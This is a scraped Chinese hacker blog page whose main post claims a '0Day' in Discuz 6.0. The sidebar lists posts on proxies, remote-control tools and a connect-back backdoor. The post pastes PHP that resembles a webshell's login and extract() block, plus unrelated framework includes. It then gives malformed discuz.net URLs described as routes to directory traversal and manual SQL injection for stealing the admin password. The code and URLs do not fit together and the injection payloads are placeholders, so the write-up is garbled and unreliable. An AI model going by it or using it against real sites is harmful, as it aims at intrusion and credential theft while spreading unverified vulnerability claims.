-
公告
- 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
-
写作时间
-
原创下载
-
最新文章
- [11/11]代理寻[全功能版]
- [11/11]最新验证HTTP代理【202枚】
- [11/11]中国部分城市HTTP代理20条
- [11/03]Three Eyes v2.1[远程控制]
- [10/30]Connect BackDoor For ShellCode
- [10/30]API函数大全
- [09/04]说一些入侵经验
- [07/05]原来--明星离我们是那么的近。
- [06/14]揭露“冰点暴力强制视频”的骗局
- [06/04]初恋女友与现在女友的区别---注:不是我哈,转载的
- [06/04]最近一段时间的生活
- [05/22]辽宁蛮女(续)
- [05/21]大家看看,这个辽宁的恶心女。
- [05/20]马英九宣誓就职 送陈水扁吕秀莲离开“总统府”
- [05/19]血浓于水!关键时刻,方可知谁是自己人!
-
最新评论
-
文章归档
-
Statistics
- 文章总数:172
- 评论总数:60
- 引用总数:0
- 浏览总数:221449
- 留言总数:0
- 当前样式:4u-HK
- 当前语言:zh-CN
-
友情链接
- 反木马在线
- warhammer gold
- warhammer gold
- 交换友情链接请与QQ:287963907联系.审核非违法网站都可通过!
-
反向链接
DZ6.0最新漏洞[0Day]
// 允许程序在 register_globals = off 的环境下工作$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "";
echo "注销成功......
三秒后自动退出或单击这里退出程序界面 >>>";
exit;
}
if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "";
echo "登陆成功......
三秒后自动跳转或单击这里进入程序界面 >>>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
---------------------------------------------------------------------------------------------------------------------
http://www.discuz.net/admin/logging.php?action=login
可以跳到其它目录
注册登录后利用
http://www.discuz.net/search.php?user%id=100
可以进行injection……
只能手工注射
注意:showpath里必须包含用户自己的路径
如果限制的话,还可以向上跳,向上级传文件的时候,不能直接
http://www. http://www.discuz.net/user/up/_id=../../....../(注射语句)
就包含用户路径
http://www.discuz.net/member.php?action=list_UserNumber=1402257EE8F
不然不能进行注射。
文件漏洞代码如下
define('__SYSTEM_ROOT', '');
include dirname(__FILE__).'/framework_gb/framework.php';
using('System.Data.Data');
using('System.Data.Plugins.Option');
using('System.Page.Page');
using('System.Smarty.Smarty');
using('System.Functions.Functions');
require_once __SYSTEM_ROOT."global.php";
require_once __SYSTEM_ROOT."vars.php";
$db=new stdClass();
$db=$Data->getDB();
/*
echo '
';print_r($Data);*/?>可以直接注射,拿到后台密码。
0 Comments , 0 Trackbacks
Jump to comment form | comments rss | Get trackback uri